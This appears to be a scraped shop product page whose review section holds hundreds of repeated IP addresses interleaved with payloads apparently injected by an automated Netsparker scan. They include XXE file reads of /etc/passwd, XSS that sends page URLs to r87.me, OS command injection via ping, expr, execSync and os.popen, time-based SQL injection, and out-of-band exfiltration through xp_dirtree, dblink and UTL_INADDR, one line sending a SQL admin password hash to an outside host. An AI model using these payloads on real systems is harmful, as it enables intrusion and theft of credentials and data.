Welcome to vvbargain
  |

£-20

product250

£10 £30
( 1313 )


hmm
Colors
Acer


this test

  • m
  • n
  • n
1313 Review For product250
  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • N3tSp4rK3R

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • ${28275*28275-(57097)}

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • NS09<s1﹥DBLʺSNGLʹNS09

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • #{28275*28275-(79089)}

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • ns:netsparker056650=vuln

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • http://example.com/? ns: netsparker056650=vuln

  • 208.100.0.117

  • <?xml version="1.0"?><!DOCTYPE ns [<!ELEMENT ns ANY><!ENTITY lfi SYSTEM "file:///C:/Windows/System32/drivers/etc/hosts">]><ns>&lfi;</ns>

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • hTTp://r87.com/n

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • ns:netsparker056650=vuln

  • 208.100.0.117

  • <?xml version="1.0"?><!DOCTYPE ns [<!ELEMENT ns ANY><!ENTITY lfi SYSTEM "file:///etc/passwd">]><ns>&lfi;</ns>

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • http://r87.com/n?.php

  • 208.100.0.117

  • 208.100.0.117

  • klusdvqthfkdb40rih3aod4_hc7ga_djbiilq443og4.r87.me

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • ns:netsparker056650=vuln

  • 208.100.0.117

  • &thisdoesntexists;

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • http://r87.com/n?.php

  • 208.100.0.117

  • <?xml version="1.0" encoding="utf-8"?><!DOCTYPE r [<!ENTITY % s "http://klusdvqt"><!ENTITY % d "hfcdnuuj-hntgtewmttbfa-tg6ni4cfyzc8.r87.me"><!ENTITY % dtd SYSTEM "http://r87.me/dtd"> %dtd;]><r>&a;</r>

  • 208.100.0.117

  • //klusdvqthfd7jmjbjgb4-7btkrll5a0qsmpcqis771s.r87.me

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • php://filter//resource=http://r87.com/n?.php

  • 208.100.0.117

  • <?xml version="1.0" encoding="utf-8"?><!DOCTYPE r [<!ENTITY % s "php://filter/resource=http://klusdvqt"><!ENTITY % d "hfpfrvivemn5b4bvbtcw7gnyzzofg2cykgs.r87.me"><!ENTITY % dtd SYSTEM "http://r87.me/dtd"> %dtd;]><r>&a;</r>

  • 208.100.0.117

  • http://r87.me/r/?id=klusdvqthf6twnx_-7fuxgg5ugbfwy96je_ffswozlm

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • http://klusdvqthfa4-cou7clceh-jmtdgsatlxsdjwvqfd-f.r87.me/p/

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • r87.com/n

  • 208.100.0.117

  • <?xml version="1.0" encoding="utf-8"?><!DOCTYPE r [<!ENTITY % s "php://filter/read=convert.base64-encode/resource=http://klusdvqt"><!ENTITY % d "hfkgxzj-mriu8gkoarbdlpvaeu52hw4siw0.r87.me"><!ENTITY % dtd SYSTEM "http://r87.me/dtd"> %dtd;]><r>&a;</r>

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • php://filter//resource=http://klusdvqthfowg2-6jqb8xrsk9jyzq-pkzf-pz1-i_yn.r87.me/p/

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • klusdvqthfgfnlgeiwldv-gdp_jgk-uq7ivoxbvshvn.r87.me/p/

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • =268409241-41351

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • <%- 268409241-91993 %>

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • "& ping -n 25 127.0.0.1 &

  • <#assign x=268409241 - 15692> ${x?string["0"]}

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • <%= "#{268409241-74522}" %>

  • '& ping -n 25 127.0.0.1 &

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • & ping -n 25 127.0.0.1 &

  • @(268409241-35069)

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • ping -n 25 127.0.0.1 &

  • {{ 268409241- 24469 }}

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • "& SET /A 0xFFF9999-10122 &

  • 208.100.0.117

  • "&ping -w 25 127.0.0.1 &"

  • (268409241-63794)

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • '"--></style></scRipt><scRipt src="//klusdvqthfle0wgyaeihouzlfiyzlfr-tvauh2q49kk&#46;r87&#46;me"></scRipt>

  • '& SET /A 0xFFF9999-47136 &

  • 208.100.0.117

  • '&ping -w 25 127.0.0.1 &'

  • 208.100.0.117

  • 208.100.0.117

  • {{ 268409241- 46695 }}

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • & SET /A 0xFFF9999-59329 &

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • &ping -w 25 127.0.0.1 &

  • <iMg src=N onerror="this.onerror='';this.src='//klusdvqthf2foegimen81xwzke-ctql9ijsplz0k'+'mpm.r87.me/r/?'+location.href">

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • SET /A 0xFFF9999-47351 &

  • 208.100.0.117

  • 208.100.0.117

  • ping -w 25 127.0.0.1 &

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • <iMg src="//r87.me/images/1.jpg" onload="this.onload='';this.src='//klusdvqthfw8hd3lgadc0qa2id9fndnwvg4tsgly'+'oyw.r87.me/r/?'+location.href">

  • SET /A 0xFFF9999-85905

  • 208.100.0.117

  • 208.100.0.117

  • ping -n 25 127.0.0.1

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • | SET /A 0xFFF9999-86251

  • 208.100.0.117

  • 208.100.0.117

  • ping -w 25 127.0.0.1

  • <fRame src=N onload="this.onload='';this.src='//klusdvqthf8jsy6_q5xas65lj_1twglg6i9pnvgo'+'yus.r87.me/r/?'+location.href">

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 1";expr 268409241 - 18059;"

  • 208.100.0.117

  • 208.100.0.117

  • |ping -n 25 127.0.0.1

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • <scRipt src="data:;base64,bD1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCJsaW5rIik7bC5yZWw9InByZWZldGNoIjtsLmhyZWY9Ii8va2x1c2R2cXRoZmxhcTBiemF3YW1neXdtbndlZnRmbnJ6ZWpxMmZxYSIrIm83by5yODcubWUvci8/Iitsb2NhdGlvbi5ocmVmO2RvY3VtZW50LmhlYWQuYXBwZW5kQ2hpbGQobCk="></scRipt>

  • 1';expr 268409241 - 69805;'

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 1;expr 268409241 - 30108;x

  • ";l=document.createElement("link");l.rel="prefetch";l.href="//klusdvqthfs7y2d1xfyfqmbxdt0yb0systle0mzk"+"yiq.r87.me/r/?"+location.href;document.head.appendChild(l);//

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • expr 268409241 - 23021;

  • 208.100.0.117

  • ';l=document.createElement("link");l.rel="prefetch";l.href="//klusdvqthfgvuo7i-feormt7oh2by8zmypeov81b"+"tsy.r87.me/r/?"+location.href;document.head.appendChild(l);//

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • expr 268409241 - 97653

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • <iframe src="//klusdvqthf80lqwmllx_udrd6unldx1i43po2cf-vxa&#46;r87&#46;me"></iframe>

  • <!--#exec cmd="expr 268409241 - 37821"-->

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • |expr${IFS}268409241${IFS}-${IFS}9336

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • %27

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • (select convert(int,cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns)

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • '+ (select convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns) +'

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 'AND 1=cast(0x5f21403264696c656d6d61 as varchar(8000)) or '1'='

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • -1 or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)

  • response.write(268409241-91384)'

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • -1' and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'

  • +response.write(268409241-16691)'

  • 208.100.0.117

  • exec('xp_dirtree ''\\klusdvqthf3zmhg-yuo4thnk9jgb88wb_nbonrra'+'vie.r87.me'+'\c$\a''')

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • -1" and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+"

  • "+response.write(268409241-36826)+"

  • declare @h varchar(999)select @h='1'+substring(name+'-'+master.sys.fn_varbintohexstr(ISNULL(password_hash,0x0)),0,63)+'.klusdvqthfdoqppgly57tseqqblybswdksy_fjmx'+'3jq.r87.me' from sys.sql_logins WHERE principal_id=1;exec('xp_dirtree ''\\'+@h+'\c$''')

  • 208.100.0.117

  • 208.100.0.117

  • 208.100.0.117

  • (SELECT CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))

  • <% response.write(268409241-18346) %>

  • 1;exec('xp_dirtree ''\\klusdvqthfxpog7hbe2afzmyuvq2nlvuyumhliy8'+'i8w.r87.me'+'\c$\a''')--

  • 208.100.0.117

  • 208.100.0.117

  • -1';exec('xp_dirtree ''\\klusdvqthfqnzuvjmcmf7t2hvqnsu1syk0ykgiyz'+'dlc.r87.me'+'\c$\a''')--

  • cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)

  • print(int)0xFFF9999-20094

  • 208.100.0.117

  • 208.100.0.117

  • 1) exec('xp_dirtree ''\\klusdvqthfx1iveust7gilbfq7udp0nsuuvqem05'+'bra.r87.me'+'\c$\a''')--

  • 208.100.0.117

  • '||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'

  • print(int)0xFFF9999-1414;

  • 208.100.0.117

  • 1')exec('xp_dirtree ''\\klusdvqthfn_dfiznal3nnv39izcqeo_3te42tet'+'u8e.r87.me'+'\c$\a''')--

  • 208.100.0.117

  • (select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL)

  • +print(int)0xFFF9999-10062;//

  • 208.100.0.117

  • 1))exec('xp_dirtree ''\\klusdvqthf_p47ut-a8py9gvaur84gqtqzh6z4m1'+'wb8.r87.me'+'\c$\a''')--

  • 208.100.0.117

  • NSFTW

  • 208.100.0.117

  • '+print(int)0xFFF9999-21724+'

  • 1'))exec('xp_dirtree ''\\klusdvqthfktpckqr-jaiswxk-otufsuc6fiurle'+'soy.r87.me'+'\c$\a''')--

  • 208.100.0.117

  • 208.100.0.117

  • '+NSFTW+'

  • syscolumns WHERE 2>3;exec('xp_dirtree ''\\klusdvqthf8l4baz06-7ge8s-dub9hjcpr2xjrfu'+'yfy.r87.me'+'\c$\a''')--

  • "+print(int)0xFFF9999-41418+"

  • 208.100.0.117

  • 208.100.0.117

  • DECLARE @q varchar(999),@r nvarchar(999)SET @q = 'SELECT * FROM OPENROWSET(''SQLOLEDB'',''@'';''a'';''1'',''SELECT 1'')'SET @r=replace(@q,'@','klusdvqthfclj8jhru-tjokneex6qomhmf3guhcj'+'msa.r87.me')exec sp_executesql @r

  • 208.100.0.117

  • (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)

  • <?=(int)0xFFF9999-60791;//?>

  • 208.100.0.117

  • 1;DECLARE @q varchar(999),@r nvarchar(999)SET @q = 'SELECT * FROM OPENROWSET(''SQLOLEDB'',''@'';''a'';''1'',''SELECT 1'')'SET @r=replace(@q,'@','klusdvqthfri1uvlz38taksf7hlf6saa4zdi4mfd'+'59e.r87.me')exec sp_executesql @r--

  • 208.100.0.117

  • -1'+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'

  • {php}print(int)0xFFF9999-57678;{/php}

  • 208.100.0.117

  • -1';DECLARE @q varchar(999),@r nvarchar(999)SET @q = 'SELECT * FROM OPENROWSET(''SQLOLEDB'',''@'';''a'';''1'',''SELECT 1'')'SET @r=replace(@q,'@','klusdvqthforkihatfphyqid6v2yueprvdsthly8'+'8d4.r87.me')exec sp_executesql @r--

  • 208.100.0.117

  • 1 procedure analyse(extractvalue(rand(),concat(0x3a,CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))),1)-- 1

  • 208.100.0.117

  • '{${print(int)0xFFF9999-52591}}'

  • SELECT dblink_connect('host=klusdvqthfqdpoon-ssypkdvmqysbz1-ij1hkpxy'||'mou.r87.me user=a password=a connect_timeout=2')

  • 208.100.0.117

  • 208.100.0.117

  • (length(CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))))

  • [php]print(int)0xFFF9999-90661;[/php]

  • dblink_connect('host=klusdvqthfnm9xliusetolzvvt5h51wtgbwxmdvt'||'kss.r87.me user=a password=a connect_timeout=2')

  • 208.100.0.117

  • 208.100.0.117

  • cast((SELECT dblink_connect('host=klusdvqthfaekdjhwrm9fbivhr-wtch092m3zmyo'||'48m.r87.me user=a password=a connect_timeout=2')) as numeric)

  • https://vvbargain.com/trace.axd

  • '||CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))||'

  • 208.100.0.117

  • ' WAITFOR DELAY '0:0:25'-- /* b0e561e7-256e-4613-a912-5855174ebbe6 */

  • 208.100.0.117

  • 208.100.0.117

  • print localtime()*0+0xFFF9999-28142

  • vvbargain.com/trace.axd

  • '+convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))+'

  • 208.100.0.117

  • 1 WAITFOR DELAY '0:0:25'-- /* 8cdd1fd6-2f23-4fda-8009-987e6eb80415 */

  • '||(SELECT dblink_connect('host=klusdvqthfqt1gmgs4d2jc-mbp8bvct9eks4_vvn'||'47c.r87.me user=a password=a connect_timeout=2'))||'

  • 208.100.0.117

  • eval('print localtime()*0+0xFFF9999-21990')

  • 162.241.252.137/trace.axd

  • 208.100.0.117

  • -1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%27

  • WAITFOR DELAY '0:0:25'-- /* 8c395fd4-05c7-48c0-af78-532bb91f824d */

  • (select UTL_INADDR.GET_HOST_ADDRESS('klusdvqthf5ek4abze8vsxlr9qc88ih1ucoakkya'||'qcw.r87.me') from DUAL)

  • 208.100.0.117

  • '+print localtime()*0+0xFFF9999-91505+'

  • 208.100.0.117

  • 127.100.11.2/trace.axd

  • -1\'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand(0)*2))x from INFORMATION_SCHEMA.COLLATIONS group by x limit 1))-- 1

  • (length(CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS('klusdvqthfcpxqgiigechzsurgttvnhpirsrkg-2'||'bze.r87.me') from DUAL))))

  • 208.100.0.117

  • 1) WAITFOR DELAY '0:0:25'-- /* 507779e9-5e6b-4562-b6d0-4dc5f8b42208 */

  • 208.100.0.117

  • "+print localtime()*0+0xFFF9999-89104+"

  • '||CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS('klusdvqthf8r7o-whs_qdpnq5htcvcqryfgz95qr'||'ym4.r87.me') from DUAL))||'

  • 127.0.0.1/trace.axd

  • 208.100.0.117

  • ') WAITFOR DELAY '0:0:25'-- /* dfb3093f-dd4a-4f99-b264-ba00944a07e9 */

  • 208.100.0.117

  • '"--></style></scRipt><scRipt>netsparker(0x023F88)</scRipt>

  • (select UTL_INADDR.GET_HOST_ADDRESS(chr(107)||chr(108)||chr(117)||chr(115)||chr(100)||chr(118)||chr(113)||chr(116)||chr(104)||chr(102)||chr(101)||chr(112)||chr(120)||chr(112)||chr(56)||chr(120)||chr(106)||chr(117)||chr(119)||chr(98)||chr(100)||chr(108)||chr(53)||chr(118)||chr(106)||chr(109)||chr(52)||chr(112)||chr(95)||chr(106)||chr(56)||chr(117)||chr(97)||chr(95)||chr(110)||chr(51)||chr(49)||chr(111)||chr(115)||chr(120)||chr(118)||chr(55)||chr(113)||chr(46)||chr(114)||chr(56)||chr(55)||chr(46)||chr(109)||chr(101)) from DUAL)

  • 208.100.0.117

  • arguments[1].end(require('child_process').execSync('expr 268409241 - 31939'))

  • [::1]/trace.axd

  • ')) WAITFOR DELAY '0:0:25'-- /* 2d4b096d-3ad2-45c4-88df-0c11944c1049 */

  • 208.100.0.117

  • (length(CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS(chr(107)||chr(108)||chr(117)||chr(115)||chr(100)||chr(118)||chr(113)||chr(116)||chr(104)||chr(102)||chr(121)||chr(101)||chr(117)||chr(99)||chr(110)||chr(112)||chr(50)||chr(113)||chr(108)||chr(116)||chr(109)||chr(103)||chr(120)||chr(104)||chr(54)||chr(101)||chr(117)||chr(107)||chr(95)||chr(111)||chr(116)||chr(109)||chr(99)||chr(120)||chr(121)||chr(113)||chr(55)||chr(45)||chr(55)||chr(111)||chr(100)||chr(119)||chr(52)||chr(46)||chr(114)||chr(56)||chr(55)||chr(46)||chr(109)||chr(101)) from DUAL))))

  • 208.100.0.117

  • %27%22--%3E%3C%2Fstyle%3E%3C%2FscRipt%3E%3CscRipt%3Enetsparker%280x023F8E%29%3C%2FscRipt%3E

  • arguments[1].end(require('child_process').execSync('set /A 268409241 - 22745'))

  • https://vvbargain.com/elmah.axd

  • 208.100.0.117

  • 1)) WAITFOR DELAY '0:0:25'-- /* 25bc95ba-9386-4095-a139-7372b991995f */

  • '||CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS(chr(107)||chr(108)||chr(117)||chr(115)||chr(100)||chr(118)||chr(113)||chr(116)||chr(104)||chr(102)||chr(120)||chr(101)||chr(112)||chr(122)||chr(111)||chr(120)||chr(105)||chr(103)||chr(115)||chr(119)||chr(54)||chr(112)||chr(105)||chr(116)||chr(118)||chr(109)||chr(98)||chr(48)||chr(121)||chr(111)||chr(57)||chr(113)||chr(98)||chr(107)||chr(57)||chr(107)||chr(99)||chr(54)||chr(114)||chr(111)||chr(54)||chr(45)||chr(56)||chr(46)||chr(114)||chr(56)||chr(55)||chr(46)||chr(109)||chr(101)) from DUAL))||'

  • 208.100.0.117

  • data:;base64,JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDIzRjkyKTwvc2NyaXB0Pg==

  • %{#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].addHeader("a",268409241-48384)}

  • 208.100.0.117

  • vvbargain.com/elmah.axd

  • 1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- /* cc4d3c44-ea1b-436c-8bc5-1558ce7cfde9 */

  • 208.100.0.117

  • '" ns=netsparker(0x023F98)

  • 208.100.0.117

  • p "#{0xFFF9999.to_i-`echo 64618`.to_i}"

  • 162.241.252.137/elmah.axd

  • 208.100.0.117

  • 1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- /* 7eaf60a7-aeb3-4e80-8409-8f56d4a95ab5 */

  • 208.100.0.117

  • 1 ns=netsparker(0x023F9C)

  • __import__('os').popen(('expr 268409241 - {0}').format('93129')).read()

  • 208.100.0.117

  • 127.100.11.2/elmah.axd

  • 1);DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- /* b631d60e-73c0-4115-92e7-cb88b68bd1e5 */

  • 208.100.0.117

  • //r87.com/n/n.css?0x023FA8

  • 208.100.0.117

  • __import__('os').popen(('SET /A 268409241 - {0}').format('99021')).read()

  • 127.0.0.1/elmah.axd

  • 208.100.0.117

  • syscolumns WHERE 2>3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- /* b8175498-4ba1-4485-a525-a879a56a5bb8 */

  • 208.100.0.117

  • //r87.com/n/j/?0x023FAC

  • 208.100.0.117

  • [::1]/elmah.axd

  • 1 + ((SELECT 1 FROM (SELECT SLEEP(25))A))/*'XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR'|"XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR"*/ /* 0bf3033c-9404-4e50-8ce9-025c3a4fbdef */

  • 208.100.0.117

  • '><net sparker=netsparker(0x023FB2)>

  • 208.100.0.117

  • https://vvbargain.com/elmah

